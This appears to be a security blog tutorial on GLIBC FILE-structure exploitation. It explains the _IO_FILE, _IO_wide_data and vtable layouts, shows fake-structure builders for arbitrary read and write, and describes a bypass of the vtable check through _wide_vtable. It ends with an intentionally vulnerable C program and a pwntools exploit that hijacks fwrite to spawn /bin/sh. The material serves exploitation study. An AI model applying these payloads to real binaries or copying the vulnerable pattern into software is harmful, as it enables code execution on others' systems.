Introduction to File Structure Exploitation

File Structure Exploitation is a binary exploitation technique that abuses GLIBC's file stream structures to gain code execution. It has become popular since hook pointers such as __malloc_hook and __free_hook were removed in GLIBC 2.34.

I came across it while searching the internet for another way to get code execution on the latest GLIBC versions.

File Structure Exploitation

File structure exploitation is an advanced binary exploitation technique that leverages memory corruption vulnerabilities to overwrite a FILE pointer and manipulate the internal data structure used by the standard I/O library to manage file streams.

Overview of the FILE Structure

In GLIBC, file structures were introduced to improve a program’s I/O performance through buffering.

The FILE structure is an important component of the standard C I/O library, representing a file stream.

struct _IO_FILE
{
  int _flags;		/* High-order word is _IO_MAGIC; rest is flags. */
  /* The following pointers correspond to the C++ streambuf protocol. */
  char *_IO_read_ptr;	/* Current read pointer */
  char *_IO_read_end;	/* End of get area. */
  char *_IO_read_base;	/* Start of putback+get area. */
  char *_IO_write_base;	/* Start of put area. */
  char *_IO_write_ptr;	/* Current put pointer. */
  char *_IO_write_end;	/* End of put area. */
  char *_IO_buf_base;	/* Start of reserve area. */
  char *_IO_buf_end;	/* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end; /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;
  struct _IO_FILE *_chain;
  int _fileno;
  int _flags2;
  __off_t _old_offset; /* This used to be _offset but it's too small.  */
  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  _IO_lock_t *_lock;

  __off64_t _offset;
  /* Wide character stream stuff.  */
  struct _IO_codecvt *_codecvt;
  struct _IO_wide_data *_wide_data;
  struct _IO_FILE *_freeres_list;
  void *_freeres_buf;
  size_t __pad5;
  int _mode;
  /* Make sure we don't get into trouble again.  */
  char _unused2[15 * sizeof (int) - 4 * sizeof (void *) - sizeof (size_t)];
};

Open file streams are joined in a singly linked list via the _chain field. This allows GLIBC to easily walk them all on exit, for example to flush and close them. The head of the linked list is _IO_list_all. GLIBC always has three file streams open: stdin, stdout and stderr.

_flags records the attributes of the file stream, such as read-only, write, append and so on. It also records the state of the stream's buffering.
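To make the role of _flags more concrete, here is a small sketch that decodes a flags value into named bits. The bit values are the ones I recall from GLIBC's libio.h and should be checked against the version you are targeting; decode_flags and FLAG_BITS are illustrative names, not part of any library. The sample value 0xFBAD2887 is one that is often seen for an unbuffered stdout.

```python
# Flag bits as recalled from glibc's libio.h (an assumption; verify per version).
IO_MAGIC = 0xFBAD0000
IO_MAGIC_MASK = 0xFFFF0000

FLAG_BITS = {
    0x0001: "_IO_USER_BUF",
    0x0002: "_IO_UNBUFFERED",
    0x0004: "_IO_NO_READS",
    0x0008: "_IO_NO_WRITES",
    0x0010: "_IO_EOF_SEEN",
    0x0020: "_IO_ERR_SEEN",
    0x0080: "_IO_LINKED",
    0x0200: "_IO_LINE_BUF",
    0x0800: "_IO_CURRENTLY_PUTTING",
    0x1000: "_IO_IS_APPENDING",
    0x2000: "_IO_IS_FILEBUF",
    0x8000: "_IO_USER_LOCK",
}


def decode_flags(flags):
    """Return (has_magic, names of the known bits that are set)."""
    has_magic = (flags & IO_MAGIC_MASK) == IO_MAGIC
    names = [name for bit, name in sorted(FLAG_BITS.items()) if flags & bit]
    return has_magic, names


if __name__ == "__main__":
    print(decode_flags(0xFBAD2887))
```

The high-order half is the magic value and the low-order half carries the attribute and buffering bits described above.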

Stream buffer pointers are divided into three parts:

  1. Read buffer : _IO_read_ptr, _IO_read_end, _IO_read_base
  2. Write buffer: _IO_write_ptr, _IO_write_end, _IO_write_base
  3. Reserve buffer: _IO_buf_base, _IO_buf_end

Where the pointers point to:

  • *_ptr points at the current position in the buffer.
  • *_base points to the beginning of the buffer.
  • *_end points to the end of the buffer.

_fileno is the file descriptor of the opened file, as returned by the open system call.

The _lock pointer is used for threaded file access.

The _wide_data field points to a similar structure used to handle wide-character streams.

/* Extra data for wide character streams.  */
struct _IO_wide_data
{
  wchar_t *_IO_read_ptr;	/* Current read pointer */
  wchar_t *_IO_read_end;	/* End of get area. */
  wchar_t *_IO_read_base;	/* Start of putback+get area. */
  wchar_t *_IO_write_base;	/* Start of put area. */
  wchar_t *_IO_write_ptr;	/* Current put pointer. */
  wchar_t *_IO_write_end;	/* End of put area. */
  wchar_t *_IO_buf_base;	/* Start of reserve area. */
  wchar_t *_IO_buf_end;		/* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  wchar_t *_IO_save_base;	/* Pointer to start of non-current get area. */
  wchar_t *_IO_backup_base;	/* Pointer to first valid character of
				   backup area */
  wchar_t *_IO_save_end;	/* Pointer to end of non-current get area. */

  __mbstate_t _IO_state;
  __mbstate_t _IO_last_state;
  struct _IO_codecvt _codecvt;

  wchar_t _shortbuf[1];

  const struct _IO_jump_t *_wide_vtable;
};

Then there is _IO_FILE_plus, which extends the FILE structure with a pointer to a virtual function table, also called a vtable.

/* We always allocate an extra word following an _IO_FILE.
   This contains a pointer to the function jump table used.
   This is for compatibility with C++ streambuf; the word can
   be used to smash to a pointer to a virtual function table. */

struct _IO_FILE_plus
{
  struct _IO_FILE file;
  const struct _IO_jump_t *vtable;
};

All streams GLIBC creates, including the default ones (stdin, stdout, stderr), use this extended version. The vtable lets GLIBC dispatch each I/O operation to the implementation that matches the type of stream.

To view this structure in GDB, we can use the ptype /o command.
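When no debugger is at hand, the field offsets can also be estimated by mirroring the struct definitions shown earlier. The sketch below does this with ctypes, assuming a 64-bit x86-64 layout (8-byte pointers, 8-byte off_t, a 64-bit host); IOFile and IOFilePlus are illustrative names, and the output should be cross-checked against ptype /o on the real target.

```python
import ctypes

PTR = ctypes.c_uint64  # stand-in for any 64-bit pointer (assumption: x86-64)


class IOFile(ctypes.Structure):
    """Mirror of struct _IO_FILE as listed above, for offset arithmetic only."""
    _fields_ = [
        ("_flags", ctypes.c_int32),
        ("_IO_read_ptr", PTR),
        ("_IO_read_end", PTR),
        ("_IO_read_base", PTR),
        ("_IO_write_base", PTR),
        ("_IO_write_ptr", PTR),
        ("_IO_write_end", PTR),
        ("_IO_buf_base", PTR),
        ("_IO_buf_end", PTR),
        ("_IO_save_base", PTR),
        ("_IO_backup_base", PTR),
        ("_IO_save_end", PTR),
        ("_markers", PTR),
        ("_chain", PTR),
        ("_fileno", ctypes.c_int32),
        ("_flags2", ctypes.c_int32),
        ("_old_offset", ctypes.c_int64),
        ("_cur_column", ctypes.c_uint16),
        ("_vtable_offset", ctypes.c_int8),
        ("_shortbuf", ctypes.c_char * 1),
        ("_lock", PTR),
        ("_offset", ctypes.c_int64),
        ("_codecvt", PTR),
        ("_wide_data", PTR),
        ("_freeres_list", PTR),
        ("_freeres_buf", PTR),
        ("__pad5", ctypes.c_uint64),
        ("_mode", ctypes.c_int32),
        # 15 * sizeof(int) - 4 * sizeof(void *) - sizeof(size_t) = 20 bytes
        ("_unused2", ctypes.c_char * 20),
    ]


class IOFilePlus(ctypes.Structure):
    """Mirror of struct _IO_FILE_plus: the FILE followed by the vtable pointer."""
    _fields_ = [("file", IOFile), ("vtable", PTR)]


if __name__ == "__main__":
    for name, _ in IOFile._fields_:
        print(hex(getattr(IOFile, name).offset), name)
    print(hex(IOFilePlus.vtable.offset), "vtable")
```

Under these assumptions the vtable pointer sits immediately after the FILE body, which is why a linear overwrite of a FILE can reach it.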

The vtable field points to an array of function pointers that GLIBC calls to carry out I/O operations. Vtables are best known from C++ binaries, where they allow dynamic function resolution at runtime. The data type of the vtable is _IO_jump_t, which stores pointers to the I/O helper functions.

struct _IO_jump_t
{
    JUMP_FIELD(size_t, __dummy);
    JUMP_FIELD(size_t, __dummy2);
    JUMP_FIELD(_IO_finish_t, __finish);
    JUMP_FIELD(_IO_overflow_t, __overflow);
    JUMP_FIELD(_IO_underflow_t, __underflow);
    JUMP_FIELD(_IO_underflow_t, __uflow);
    JUMP_FIELD(_IO_pbackfail_t, __pbackfail);
    /* showmany */
    JUMP_FIELD(_IO_xsputn_t, __xsputn);
    JUMP_FIELD(_IO_xsgetn_t, __xsgetn);
    JUMP_FIELD(_IO_seekoff_t, __seekoff);
    JUMP_FIELD(_IO_seekpos_t, __seekpos);
    JUMP_FIELD(_IO_setbuf_t, __setbuf);
    JUMP_FIELD(_IO_sync_t, __sync);
    JUMP_FIELD(_IO_doallocate_t, __doallocate);
    JUMP_FIELD(_IO_read_t, __read);
    JUMP_FIELD(_IO_write_t, __write);
    JUMP_FIELD(_IO_seek_t, __seek);
    JUMP_FIELD(_IO_close_t, __close);
    JUMP_FIELD(_IO_stat_t, __stat);
    JUMP_FIELD(_IO_showmanyc_t, __showmanyc);
    JUMP_FIELD(_IO_imbue_t, __imbue);
};
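Since each JUMP_FIELD occupies one pointer-sized slot, the byte offset of an entry inside the table is just its index times the pointer size. A minimal sketch of that arithmetic, assuming 8-byte pointers (x86-64) and the field order listed above; slot_offset is an illustrative helper:

```python
# Field order copied from the struct _IO_jump_t listing above.
JUMP_FIELDS = [
    "__dummy", "__dummy2", "__finish", "__overflow", "__underflow",
    "__uflow", "__pbackfail", "__xsputn", "__xsgetn", "__seekoff",
    "__seekpos", "__setbuf", "__sync", "__doallocate", "__read",
    "__write", "__seek", "__close", "__stat", "__showmanyc", "__imbue",
]

POINTER_SIZE = 8  # assumption: 64-bit target


def slot_offset(name):
    """Byte offset of a jump-table entry from the start of the vtable."""
    return JUMP_FIELDS.index(name) * POINTER_SIZE


if __name__ == "__main__":
    for field in ("__overflow", "__xsputn", "__doallocate"):
        print(field, hex(slot_offset(field)))
```

These offsets are what a fake vtable has to respect: the target address goes in the slot of whichever function will be triggered.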

Exploitation

This technique can be used to read and write arbitrary memory by corrupting the stream's buffer pointers, such as _IO_buf_base and _IO_write_base. It can also lead to arbitrary code execution through vtable hijacking.

The pwntools library provides a FileStructure class that helps build these fake structures.

Arbitrary Write (Reading Data In)

Requirements

  • Set _flags so that _IO_NO_READS (0x4) is clear
  • Set read_ptr = read_end
  • Set buf_base to the address to write to
  • Set buf_end to the address to write to + length (the end point)
  • buf_end - buf_base must be larger than the number of bytes requested by fread

We use fread to read bytes from stdin to a buffer

FILE *fp = fopen("./flag.txt", "r");
read(0, fp, 0x100);
char buf[0x100];
fread(buf, 1, 10, fp);

Pwntools

addr = 0xdeadbeef # address to write
size = 0x10 # must be larger than bytes read on `fread`
fp = FileStructure()
payload = fp.read(addr, size)
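For readers without pwntools installed, the following sketch shows roughly what such a payload contains, using only the standard library. It is my approximation of the requirements listed above, not the pwntools implementation: the function name, the choice of bare magic flags, and stopping the payload right after _fileno are assumptions, and the layout assumes x86-64.

```python
import struct

IO_MAGIC = 0xFBAD0000
IO_NO_READS = 0x4

# The first 14 eight-byte slots of struct _IO_FILE on x86-64
# (the 4-byte _flags plus its padding is treated as one slot).
FIELDS = [
    "_flags", "_IO_read_ptr", "_IO_read_end", "_IO_read_base",
    "_IO_write_base", "_IO_write_ptr", "_IO_write_end",
    "_IO_buf_base", "_IO_buf_end", "_IO_save_base",
    "_IO_backup_base", "_IO_save_end", "_markers", "_chain",
]


def fake_file_for_write(addr, size, flags=IO_MAGIC, fileno=0):
    """Fake FILE prefix that makes fread fill [addr, addr + size) from fileno."""
    values = dict.fromkeys(FIELDS, 0)
    values["_flags"] = flags & ~IO_NO_READS   # reading must be allowed
    values["_IO_buf_base"] = addr             # start of the "buffer"
    values["_IO_buf_end"] = addr + size       # end of the "buffer"
    # read_ptr == read_end (both 0), so the stream looks empty and must refill.
    return struct.pack("<14QI", *(values[f] for f in FIELDS), fileno)


if __name__ == "__main__":
    print(fake_file_for_write(0x404040, 0x10).hex())
```

Setting fileno to 0 makes the refill come from stdin, which is what lets the attacker choose the bytes that land at the target address.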

Arbitrary Read (Writing Data Out)

Requirements

  • Set _flags so that _IO_NO_WRITES (0x8) is clear and _IO_CURRENTLY_PUTTING (0x800) is set
  • Set write_base to the address to read from
  • Set write_ptr to the address to read from + length
  • Set read_end = write_base
  • buf_end - buf_base >= number of bytes to write

We use the fwrite function to write a buffer to stdout

FILE *fp = fopen("file", "w");
char buf[0x100];
fwrite(buf, 1, 40, fp);

Pwntools

addr = 0xdeadbeef # address to read
size = 0x10 # must be larger than bytes written on `fwrite`
fp = FileStructure()
payload = fp.write(addr, size)
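The same idea can be sketched without pwntools. This is an approximation built from the requirements listed above, not the pwntools implementation: the function name, the bare magic flags, and ending the payload right after _fileno are assumptions, and the slot positions assume x86-64.

```python
import struct

IO_MAGIC = 0xFBAD0000
IO_NO_WRITES = 0x8
IO_CURRENTLY_PUTTING = 0x800


def fake_file_for_read(addr, size, flags=IO_MAGIC, fileno=1):
    """Fake FILE prefix that makes the next flush emit [addr, addr + size)."""
    slots = [0] * 14                       # _flags .. _chain, 8 bytes each
    slots[0] = (flags & ~IO_NO_WRITES) | IO_CURRENTLY_PUTTING
    slots[2] = addr                        # _IO_read_end == _IO_write_base
    slots[4] = addr                        # _IO_write_base: first byte to leak
    slots[5] = addr + size                 # _IO_write_ptr: one past the last byte
    return struct.pack("<14QI", *slots, fileno)


if __name__ == "__main__":
    print(fake_file_for_read(0x601000, 0x20).hex())
```

Keeping read_end equal to write_base is, as far as I can tell, what stops GLIBC from attempting a seek before it writes the pending bytes out; with fileno set to 1 the leaked bytes arrive on stdout.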

vtable hijacking

Protections

Before looking at how to exploit this, we need to understand the protection GLIBC applies to vtable pointers.

The function IO_validate_vtable() was added in GLIBC version 2.24 and checks the vtable pointer before it is used:

  1. It checks whether the vtable pointer lies inside the __libc_IO_vtables section, the region of libc where the default vtables are stored.
/* Perform vtable pointer validation.  If validation fails, terminate
   the process.  */
static inline const struct _IO_jump_t *
IO_validate_vtable (const struct _IO_jump_t *vtable) {
  /* Fast path: The vtable pointer is within the __libc_IO_vtables
     section.  */
  uintptr_t section_length = __stop___libc_IO_vtables - __start___libc_IO_vtables;
  uintptr_t ptr = (uintptr_t) vtable;
  uintptr_t offset = ptr - (uintptr_t) __start___libc_IO_vtables;
  if (__glibc_unlikely (offset >= section_length))
    /* The vtable pointer is not in the expected section.  Use the
       slow path, which will terminate the process if necessary.  */
    _IO_vtable_check ();
  return vtable;
}
  • If the check fails, it calls _IO_vtable_check(), which compares the (demangled) value stored in IO_accept_foreign_vtables with the address of _IO_vtable_check. Execution proceeds only if they match; otherwise the process aborts.

  • This can be bypassed: instead of replacing the vtable of the _IO_FILE, we replace the vtable of its _IO_wide_data, which does not pass through IO_validate_vtable().

    • Instead of replacing fp->vtable, we replace fp->_wide_data->_wide_vtable, which does not go through the same checks.
    • We make GLIBC use fp->_wide_data->_wide_vtable by pointing fp->vtable at a legitimate wide-character jump table such as _IO_wfile_jumps, whose overflow handler is _IO_wfile_overflow.
    • Triggering that handler gives arbitrary code execution.
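The fast-path range check in IO_validate_vtable() can be modelled in a few lines. The sketch below reproduces the unsigned subtraction from the C code shown earlier; the section bounds and pointer values are made-up numbers for illustration, not real libc addresses.

```python
MASK64 = (1 << 64) - 1


def in_vtable_section(vtable, start, stop):
    """Model of the fast path: True if vtable lies in [start, stop)."""
    section_length = stop - start
    # uintptr_t arithmetic wraps, so a pointer below start becomes a huge offset.
    offset = (vtable - start) & MASK64
    return offset < section_length


if __name__ == "__main__":
    start, stop = 0x7F0000216000, 0x7F0000216D68   # hypothetical section bounds
    libc_table = start + 0x0C0                      # hypothetical default vtable
    heap_table = 0x55550000A2A0                     # hypothetical fake vtable
    print(in_vtable_section(libc_table, start, stop))
    print(in_vtable_section(heap_table, start, stop))
```

A pointer to a real table inside the section passes, while a fake table on the heap or stack falls outside it. That is why the bypass keeps fp->vtable inside the section and moves the fake table to the unchecked _wide_vtable instead.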

Exploit

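The vtable is full of function pointers, which GLIBC uses to give file streams object-oriented behaviour. If you can overwrite a function pointer inside the vtable of a file stream and then trigger that function, you control the instruction pointer.

We create our own fake vtable, which can be placed anywhere in memory we control. We then place the desired execution address at the correct offset and overwrite the relevant vtable pointer so that it points to our fake vtable. Because of the check described above, on recent GLIBC versions this is the _wide_vtable pointer in _IO_wide_data rather than the vtable pointer that follows the _IO_FILE struct.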

The _lock field (of type _IO_lock_t *) is used in multi-threaded programs to prevent race conditions. An exploit must set _lock to point to:

  • a writable location
  • whose value is NULL

Overwrite one of the functions in file._wide_data._wide_vtable that will be called.

If we point the vtable at one of the wide-character jump tables (_IO_wXXXX_jumps), GLIBC treats the stream as a wide-character stream and ends up in _IO_wfile_overflow. If we also make _wide_data point to a fake _IO_wide_data struct that we control, whose _wide_vtable points to our exploit_vtable, the call made through _wide_vtable lands on an address of our choosing.

wide_data also contains its own vtable, const struct _IO_jump_t *_wide_vtable;

Usage

  1. Set up exploit_vtable, a fake vtable.
  2. Set up file._wide_data->_wide_vtable so that it points to exploit_vtable.
  3. Overwrite file.vtable such that _IO_wfile_overflow gets called.
  4. _IO_wfile_overflow then calls _IO_wdoallocbuf.
  5. _IO_wdoallocbuf then calls the __doallocate entry of file._wide_data->_wide_vtable.

fwrite -> _IO_wfile_overflow -> _IO_wdoallocbuf -> <target addr> (win)
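The call chain above ends in the __doallocate slot of the fake wide vtable. As a rough sketch of how the two fake structures can sit back to back in one controlled buffer, the code below builds the bytes with the standard library only. It assumes x86-64, a _wide_vtable offset of 0xe0 inside _IO_wide_data, and slot index 13 for __doallocate; the addresses are placeholders and build_wide_payload is an illustrative name.

```python
import struct

WIDE_VTABLE_OFFSET = 0xE0   # assumed offset of _wide_vtable in _IO_wide_data
DOALLOCATE_INDEX = 13       # position of __doallocate in struct _IO_jump_t


def build_wide_payload(buf, target):
    """Fake _IO_wide_data at buf, immediately followed by a fake vtable."""
    vtable_addr = buf + WIDE_VTABLE_OFFSET + 8
    # Every field before _wide_vtable stays zero (NULL buffer pointers).
    wide_data = b"\x00" * WIDE_VTABLE_OFFSET + struct.pack("<Q", vtable_addr)
    # Slots 0..12 are unused here; slot 13 receives the address to call.
    fake_vtable = struct.pack("<Q", 0) * DOALLOCATE_INDEX + struct.pack("<Q", target)
    return wide_data + fake_vtable


if __name__ == "__main__":
    payload = build_wide_payload(buf=0x7FFD00001000, target=0x401196)
    print(len(payload), payload[WIDE_VTABLE_OFFSET:WIDE_VTABLE_OFFSET + 8].hex())
```

Leaving the rest of the fake _IO_wide_data zeroed is deliberate: as far as I understand the GLIBC code, the wide write and buffer base pointers need to be NULL for the allocation path to be taken.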

When space is limited, structs can be overlapped as long as the offsets accessed return reasonable values.

glibc_2.36

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

void win() {
	puts("You WIN");
	system("/bin/sh");
}
int main() {
	setbuf(stdout, NULL);
	setbuf(stdin, NULL);
	setbuf(stderr, NULL);
	
	printf("win @ %p\nputs @ %p\n", win, puts);

	FILE *fp = fopen("/dev/null", "w");

	char buf[0x1000];
	printf("reading into buf @ %p\n", buf);
	read(0, buf, 0x1000);
	printf("reading into fp: ");
	read(0, fp, 0x1000);

	puts("calling fwrite");
	fwrite(buf, 1, 10, fp);
	exit(0);
}

exploit

# Assumes the author's pwntools template: ru/rl/sl/sla are taken to be
# shorthands for recvuntil/recvline/sendline/sendlineafter, print_leak is a
# logging helper, and libc is an ELF object for the target's libc.
def exploit():
	# Parse the addresses printed by the target.
	ru(b"@ ")
	win = int(rl(), 16)
	ru(b"@ ")
	puts = int(rl(), 16)
	# Derive the libc base from the puts leak instead of hardcoding it.
	libc.address = puts - libc.sym['puts']
	
	ru(b"@ ")
	buf = int(rl(), 16)

	print_leak("win", win)
	print_leak("puts", puts)
	print_leak("libc base addr", libc.address)
	print_leak("stack buf", buf)

	# Fake vtable: slot 13 (__doallocate) holds win.
	exploit_vtable = p64(0)*13 + p64(win)
	# Fake _IO_wide_data: zeroed up to offset 0xe0, where _wide_vtable
	# points just past itself (buf+0xe8), at exploit_vtable.
	wide_data = p64(0)*0x1c + p64(buf+0xe8)
	"""
	wide_data {
	...
	_wide_vtable = wide_data+0xe8; (exploit_vtable)
	}
	
	exploit_vtable {
	... 
	win
	}
	"""
	sl(wide_data + exploit_vtable)
	# null = buf makes _lock point at writable memory that holds NULL.
	fp  = FileStructure(null = buf)
	fp.vtable = libc.sym._IO_wfile_jumps # must be within __libc_IO_vtables
	fp._wide_data = buf
	sla(b"fp: ", bytes(fp))

File structure exploitation can still be used when a program does not perform any FILE I/O operations itself.

  1. _IO_list_all hijacking: by overwriting _IO_list_all with a pointer to a fake _IO_FILE_plus structure, the next time GLIBC walks the list of streams it uses the fake structure, which gives us control over the vtable.
    • To trigger this, the program needs to call exit() (or return from main). During cleanup GLIBC flushes every stream on the list (_IO_flush_all_lockp), calling the overflow handler of each stream that has pending output, including our fake one.
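To illustrate which streams the exit-time flush acts on, here is a simplified model of the list walk. It follows my reading of the flush condition in GLIBC (a stream counts as having pending output when its write pointer is past its write base, with the wide-character fields used when _mode is positive) and leaves out details such as locking. The dictionaries stand in for process memory and all addresses are invented.

```python
def has_pending_output(fp):
    """Simplified version of the condition checked for each stream."""
    narrow = fp["_mode"] <= 0 and fp["_IO_write_ptr"] > fp["_IO_write_base"]
    wide = fp["_mode"] > 0 and fp["wide_write_ptr"] > fp["wide_write_base"]
    return narrow or wide


def streams_flushed_at_exit(memory, list_all):
    """Walk the _chain list from list_all; return streams whose overflow runs."""
    flushed = []
    addr = list_all
    while addr != 0:
        fp = memory[addr]
        if has_pending_output(fp):
            flushed.append(addr)   # glibc would call the vtable's __overflow here
        addr = fp["_chain"]
    return flushed


def stream(chain, write_base=0, write_ptr=0, mode=0):
    """Build a toy stream record with only the fields the model needs."""
    return {
        "_chain": chain, "_mode": mode,
        "_IO_write_base": write_base, "_IO_write_ptr": write_ptr,
        "wide_write_base": 0, "wide_write_ptr": 0,
    }


if __name__ == "__main__":
    memory = {
        0x5000: stream(chain=0x7000, write_base=0, write_ptr=1),  # fake stream
        0x7000: stream(chain=0),                                   # idle stream
    }
    print([hex(a) for a in streams_flushed_at_exit(memory, 0x5000)])
```

In this model a fake structure only has its handler called if it looks like it has unflushed data, so the fake FILE needs a write pointer greater than its write base as well as a usable vtable.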

This post is licensed under CC BY 4.0 by the author.